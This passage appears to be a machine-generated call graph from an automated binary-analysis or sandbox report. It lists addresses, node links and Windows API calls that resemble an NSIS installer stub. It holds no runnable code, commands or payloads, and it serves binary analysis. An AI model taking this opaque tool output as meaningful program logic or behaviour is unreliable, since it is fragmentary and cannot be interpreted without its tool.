4029cb 4724->4731 4728 402918 4725->4728 4729 40292a 4725->4729 4733 4062cf 11 API calls 4726->4733 4734 40297b 4727->4734 4735 4062cf 11 API calls 4728->4735 4736 4062cf 11 API calls 4729->4736 4730->4723 4732 4062cf 11 API calls 4731->4732 4732->4730 4733->4720 4742 406250 4734->4742 4739 402922 4735->4739 4736->4719 4739->4724 4741 4062cf 11 API calls 4741->4739 4743 406273 4742->4743 4744 4062b6 4743->4744 4745 406288 wsprintfW 4743->4745 4746 402991 4744->4746 4747 4062bf lstrcatW 4744->4747 4745->4744 4745->4745 4746->4741 4747->4746 4748 403d02 4749 403d0d 4748->4749 4750 403d11 4749->4750 4751 403d14 GlobalAlloc 4749->4751 4751->4750 4752 402082 4753 401446 18 API calls 4752->4753 4754 402093 SetWindowLongW 4753->4754 4755 4030e3 4754->4755 4756 402a84 4757 401553 19 API calls 4756->4757 4758 402a8e 4757->4758 4759 401446 18 API calls 4758->4759 4760 402a98 4759->4760 4761 401a13 4760->4761 4762 402ab2 RegEnumKeyW 4760->4762 4763 402abe RegEnumValueW 4760->4763 4764 402a7e 4762->4764 4763->4761 4763->4764 4764->4761 4765 4029e4 RegCloseKey 4764->4765 4765->4761 4766 402c8a 4767 402ca2 4766->4767 4768 402c8f 4766->4768 4770 40145c 18 API calls 4767->4770 4769 401446 18 API calls 4768->4769 4772 402c97 4769->4772 4771 402ca9 lstrlenW 4770->4771 4771->4772 4773 401a13 4772->4773 4774 402ccb WriteFile 4772->4774 4774->4773 4775 401d8e 4776 40145c 18 API calls 4775->4776 4777 401d95 ExpandEnvironmentStringsW 4776->4777 4778 401da8 4777->4778 4779 401db9 4777->4779 4778->4779 4780 401dad lstrcmpW 4778->4780 4780->4779 4781 401e0f 4782 401446 18 API calls 4781->4782 4783 401e17 4782->4783 4784 401446 18 API calls 4783->4784 4785 401e21 4784->4785 4786 4030e3 4785->4786 4788 405f7d wsprintfW 4785->4788 4788->4786 4789 40438f 4790 4043c8 4789->4790 4791 40439f 4789->4791 4792 403df6 8 API calls 4790->4792 4793 403d6b 19 API calls 4791->4793 4795 4043d4 4792->4795 4794 4043ac SetDlgItemTextW 4793->4794 4794->4790 4796 403f90 4797 403fa0 4796->4797 4798 403fbc 4796->4798 4807 405cb0 GetDlgItemTextW 4797->4807 4800 403fc2 SHGetPathFromIDListW 4798->4800 4801 403fef 4798->4801 4803 403fd2 4800->4803 4806 403fd9 SendMessageW 4800->4806 4802 403fad SendMessageW 4802->4798 4804 40141d 80 API calls 4803->4804 4804->4806 4806->4801 4807->4802 4808 402392 4809 40145c 18 API calls 4808->4809 4810 402399 4809->4810 4813 407224 4810->4813 4814 406efe 25 API calls 4813->4814 4815 407244 4814->4815 4816 4023a7 4815->4816 4817 40724e lstrcpynW lstrcmpW 4815->4817 4818 407280 4817->4818 4819 407286 lstrcpynW 4817->4819 4818->4819 4819->4816 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4820 402797 4821 40145c 18 API calls 4820->4821 4822 4027ae 4821->4822 4823 40145c 18 API calls 4822->4823 4824 4027b7 4823->4824 4825 40145c 18 API calls 4824->4825 4826 4027c0 GetPrivateProfileStringW lstrcmpW 4825->4826 4827 401e9a 4828 40145c 18 API calls 4827->4828 4829 401ea1 4828->4829 4830 401446 18 API calls 4829->4830 4831 401eab wsprintfW 4830->4831 3791 401a1f 3792 40145c 18 API calls 3791->3792 3793 401a26 3792->3793 3794 4062cf 11 API calls 3793->3794 3795 401a49 3794->3795 3796 401a64 3795->3796 3797 401a5c 3795->3797 3866 406035 lstrcpynW 3796->3866 3865 406035 lstrcpynW 3797->3865 3800 401a6f 3867 40674e lstrlenW CharPrevW 3800->3867 3801 401a62 3804 406064 5 API calls 3801->3804 3835 401a81 3804->3835 3805 406301 2 API calls 3805->3835 3808 401a98 CompareFileTime 3808->3835 3809 401ba9 3810 404f9e 25 API calls 3809->3810 3812 401bb3 3810->3812 3811 401b5d 3813 404f9e 25 API calls 3811->3813 3844 40337f 3812->3844 3815 401b70 3813->3815 3819 4062cf 11 API calls 3815->3819 3817 406035 lstrcpynW 3817->3835 3818 4062cf 11 API calls 3820 401bda 3818->3820 3824 401b8b 3819->3824 3821 401be9 SetFileTime 3820->3821 3822 401bf8 CloseHandle 3820->3822 3821->3822 3822->3824 3825 401c09 3822->3825 3823 406831 18 API calls 3823->3835 3826 401c21 3825->3826 3827 401c0e 3825->3827 3828 406831 18 API calls 3826->3828 3829 406831 18 API calls 3827->3829 3830 401c29 3828->3830 3832 401c16 lstrcatW 3829->3832 3833 4062cf 11 API calls 3830->3833 3832->3830 3836 401c34 3833->3836 3834 401b50 3838 401b93 3834->3838 3839 401b53 3834->3839 3835->3805 3835->3808 3835->3809 3835->3811 3835->3817 3835->3823 3835->3834 3837 4062cf 11 API calls 3835->3837 3843 405e7c GetFileAttributesW CreateFileW 3835->3843 3870 405e5c GetFileAttributesW 3835->3870 3873 405ccc 3835->3873 3840 405ccc MessageBoxIndirectW 3836->3840 3837->3835 3841 4062cf 11 API calls 3838->3841 3842 4062cf 11 API calls 3839->3842 3840->3824 3841->3824 3842->3811 3843->3835 3845 40339a 3844->3845 3846 4033c7 3845->3846 3879 403368 SetFilePointer 3845->3879 3877 403336 ReadFile 3846->3877 3850 401bc6 3850->3818 3851 403546 3853 40354a 3851->3853 3854 40356e 3851->3854 3852 4033eb GetTickCount 3852->3850 3857 403438 3852->3857 3855 403336 ReadFile 3853->3855 3854->3850 3858 403336 ReadFile 3854->3858 3859 40358d WriteFile 3854->3859 3855->3850 3856 403336 ReadFile 3856->3857 3857->3850 3857->3856 3861 40348a GetTickCount 3857->3861 3862 4034af MulDiv wsprintfW 3857->3862 3864 4034f3 WriteFile 3857->3864 3858->3854 3859->3850 3860 4035a1 3859->3860 3860->3850 3860->3854 3861->3857 3863 404f9e 25 API calls 3862->3863 3863->3857 3864->3850 3864->3857 3865->3801 3866->3800 3868 401a75 lstrcatW 3867->3868 3869 40676b lstrcatW 3867->3869 3868->3801 3869->3868 3871 405e79 3870->3871 3872 405e6b SetFileAttributesW 3870->3872 3871->3835 3872->3871 3874 405ce1 3873->3874 3875 405d2f 3874->3875 3876 405cf7 MessageBoxIndirectW 3874->3876 3875->3835 3876->3875 3878 403357 3877->3878 3878->3850 3878->3851 3878->3852 3879->3846 4832 40209f GetDlgItem GetClientRect 4833 40145c 18 API calls 4832->4833 4834 4020cf LoadImageW SendMessageW 4833->4834 4835 4030e3 4834->4835 4836 4020ed DeleteObject 4834->4836 4836->4835 4837 402b9f 4838 401446 18 API calls 4837->4838 4842 402ba7 4838->4842 4839 402c4a 4840 402bdf ReadFile 4840->4842 4849 402c3d 4840->4849 4841 401446 18 API calls 4841->4849 4842->4839 4842->4840 4843 402c06 MultiByteToWideChar 4842->4843 4844 402c3f 4842->4844 4845 402c4f 4842->4845 4842->4849 4843->4842 4843->4845 4850 405f7d wsprintfW 4844->4850 4847 402c6b SetFilePointer 4845->4847 4845->4849 4847->4849 4848 402d17 ReadFile 4848->4849 4849->4839 4849->4841 4849->4848 4850->4839 4851 402b23 GlobalAlloc 4852 402b39 4851->4852 4853 402b4b 4851->4853 4854 401446 18 API calls 4852->4854 4855 40145c 18 API calls 4853->4855 4857 402b41 4854->4857 4856 402b52 WideCharToMultiByte lstrlenA 4855->4856 4856->4857 4858 402b84 WriteFile 4857->4858 4859 402b93 4857->4859 4858->4859 4860 402384 GlobalFree 4858->4860 4860->4859 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3880 4038af #17 SetErrorMode OleInitialize 3881 406328 3 API calls 3880->3881 3882 4038f2 SHGetFileInfoW 3881->3882 3954 406035 lstrcpynW 3882->3954 3884 40391d GetCommandLineW 3955 406035 lstrcpynW 3884->3955 3886 40392f GetModuleHandleW 3887 403947 3886->3887 3888 405d32 CharNextW 3887->3888 3889 403956 CharNextW 3888->3889 3900 403968 3889->3900 3890 403a02 3891 403a21 GetTempPathW 3890->3891 3956 4037f8 3891->3956 3893 403a37 3895 403a3b GetWindowsDirectoryW lstrcatW 3893->3895 3896 403a5f DeleteFileW 3893->3896 3894 405d32 CharNextW 3894->3900 3898 4037f8 11 API calls 3895->3898 3964 4035b3 GetTickCount GetModuleFileNameW 3896->3964 3901 403a57 3898->3901 3899 403a73 3902 403af8 3899->3902 3904 405d32 CharNextW 3899->3904 3940 403add 3899->3940 3900->3890 3900->3894 3907 403a04 3900->3907 3901->3896 3901->3902 4049 403885 3902->4049 3908 403a8a 3904->3908 4056 406035 lstrcpynW 3907->4056 3919 403b23 lstrcatW lstrcmpiW 3908->3919 3920 403ab5 3908->3920 3909 403aed 3912 406113 9 API calls 3909->3912 3910 403bfa 3913 403c7d 3910->3913 3915 406328 3 API calls 3910->3915 3911 403b0d 3914 405ccc MessageBoxIndirectW 3911->3914 3912->3902 3916 403b1b ExitProcess 3914->3916 3918 403c09 3915->3918 3922 406328 3 API calls 3918->3922 3919->3902 3921 403b3f CreateDirectoryW SetCurrentDirectoryW 3919->3921 4057 4067aa 3920->4057 3924 403b62 3921->3924 3925 403b57 3921->3925 3926 403c12 3922->3926 4074 406035 lstrcpynW 3924->4074 4073 406035 lstrcpynW 3925->4073 3930 406328 3 API calls 3926->3930 3933 403c1b 3930->3933 3932 403b70 4075 406035 lstrcpynW 3932->4075 3934 403c69 ExitWindowsEx 3933->3934 3939 403c29 GetCurrentProcess 3933->3939 3934->3913 3938 403c76 3934->3938 3935 403ad2 4072 406035 lstrcpynW 3935->4072 3941 40141d 80 API calls 3938->3941 3943 403c39 3939->3943 3992 405958 3940->3992 3941->3913 3942 406831 18 API calls 3944 403b98 DeleteFileW 3942->3944 3943->3934 3945 403ba5 CopyFileW 3944->3945 3951 403b7f 3944->3951 3945->3951 3946 403bee 3947 406c94 42 API calls 3946->3947 3949 403bf5 3947->3949 3948 406c94 42 API calls 3948->3951 3949->3902 3950 406831 18 API calls 3950->3951 3951->3942 3951->3946 3951->3948 3951->3950 3953 403bd9 CloseHandle 3951->3953 4076 405c6b CreateProcessW 3951->4076 3953->3951 3954->3884 3955->3886 3957 406064 5 API calls 3956->3957 3958 403804 3957->3958 3959 40380e 3958->3959 3960 40674e 3 API calls 3958->3960 3959->3893 3961 403816 CreateDirectoryW 3960->3961 3962 405eab 2 API calls 3961->3962 3963 40382a 3962->3963 3963->3893 4079 405e7c GetFileAttributesW CreateFileW 3964->4079 3966 4035f3 3986 403603 3966->3986 4080 406035 lstrcpynW 3966->4080 3968 403619 4081 40677d lstrlenW 3968->4081 3972 40362a GetFileSize 3973 403726 3972->3973 3987 403641 3972->3987 4086 4032d2 3973->4086 3975 40372f 3977 40376b GlobalAlloc 3975->3977 3975->3986 4098 403368 SetFilePointer 3975->4098 3976 403336 ReadFile 3976->3987 4097 403368 SetFilePointer 3977->4097 3980 4037e9 3983 4032d2 6 API calls 3980->3983 3981 403786 3984 40337f 33 API calls 3981->3984 3982 40374c 3985 403336 ReadFile 3982->3985 3983->3986 3990 403792 3984->3990 3989 403757 3985->3989 3986->3899 3987->3973 3987->3976 3987->3980 3987->3986 3988 4032d2 6 API calls 3987->3988 3988->3987 3989->3977 3989->3986 3990->3986 3990->3990 3991 4037c0 SetFilePointer 3990->3991 3991->3986 3993 406328 3 API calls 3992->3993 3994 40596c 3993->3994 3995 405972 3994->3995 3996 405984 3994->3996 4112 405f7d wsprintfW 3995->4112 3997 405eff 3 API calls 3996->3997 3998 4059b5 3997->3998 4000 4059d4 lstrcatW 3998->4000 4002 405eff 3 API calls 3998->4002 4001 405982 4000->4001 4103 403ec1 4001->4103 4002->4000 4005 4067aa 18 API calls 4006 405a06 4005->4006 4007 405a9c 4006->4007 4009 405eff 3 API calls 4006->4009 4008 4067aa 18 API calls 4007->4008 4010 405aa2 4008->4010 4011 405a38 4009->4011 4012 405ab2 4010->4012 4013 406831 18 API calls 4010->4013 4011->4007 4015 405a5b lstrlenW 4011->4015 4018 405d32 CharNextW 4011->4018 4014 405ad2 LoadImageW 4012->4014 4114 403ea0 4012->4114 4013->4012 4016 405b92 4014->4016 4017 405afd RegisterClassW 4014->4017 4019 405a69 lstrcmpiW 4015->4019 4020 405a8f 4015->4020 4024 40141d 80 API calls 4016->4024 4022 405b9c 4017->4022 4023 405b45 SystemParametersInfoW CreateWindowExW 4017->4023 4025 405a56 4018->4025 4019->4020 4026 405a79 GetFileAttributesW 4019->4026 4028 40674e 3 API calls 4020->4028 4022->3909 4023->4016 4029 405b98 4024->4029 4025->4015 4030 405a85 4026->4030 4027 405ac8 4027->4014 4031 405a95 4028->4031 4029->4022 4032 403ec1 19 API calls 4029->4032 4030->4020 4033 40677d 2 API calls 4030->4033 4113 406035 lstrcpynW 4031->4113 4035 405ba9 4032->4035 4033->4020 4036 405bb5 ShowWindow LoadLibraryW 4035->4036 4037 405c38 4035->4037 4038 405bd4 LoadLibraryW 4036->4038 4039 405bdb GetClassInfoW 4036->4039 4040 405073 83 API calls 4037->4040 4038->4039 4041 405c05 DialogBoxParamW 4039->4041 4042 405bef GetClassInfoW RegisterClassW 4039->4042 4043 405c3e 4040->4043 4046 40141d 80 API calls 4041->4046 4042->4041 4044 405c42 4043->4044 4045 405c5a 4043->4045 4044->4022 4048 40141d 80 API calls 4044->4048 4047 40141d 80 API calls 4045->4047 4046->4022 4047->4022 4048->4022 4050 40389d 4049->4050 4051 40388f CloseHandle 4049->4051 4121 403caf 4050->4121 4051->4050 4056->3891 4174 406035 lstrcpynW 4057->4174 4059 4067bb 4060 405d85 4 API calls 4059->4060 4061 4067c1 4060->4061 4062 406064 5 API calls 4061->4062 4069 403ac3 4061->4069 4065 4067d1 4062->4065 4063 406809 lstrlenW 4064 406810 4063->4064 4063->4065 4067 40674e 3 API calls 4064->4067 4065->4063 4066 406301 2 API calls 4065->4066 4065->4069 4070 40677d 2 API calls 4065->4070 4066->4065 4068 406816 GetFileAttributesW 4067->4068 4068->4069 4069->3902 4071 406035 lstrcpynW 4069->4071 4070->4063 4071->3935 4072->3940 4073->3924 4074->3932 4075->3951 4077 405ca6 4076->4077 4078 405c9a CloseHandle 4076->4078 4077->3951 4078->4077 4079->3966 4080->3968 4082 40678c 4081->4082 4083 406792 CharPrevW 4082->4083 4084 40361f 4082->4084 4083->4082 4083->4084 4085 406035 lstrcpynW 4084->4085 4085->3972 4087 4032f3 4086->4087 4088 4032db 4086->4088 4091 403303 GetTickCount 4087->4091 4092 4032fb 4087->4092 4089 4032e4 DestroyWindow 4088->4089 4090 4032eb 4088->4090 4089->4090 4090->3975 4094 403311 CreateDialogParamW ShowWindow 4091->4094 4095 403334 4091->4095 4099 40635e 4092->4099 4094->4095 4095->3975 4097->3981 4098->3982 4100 40637b PeekMessageW 4099->4100 4101 406371 DispatchMessageW 4100->4101 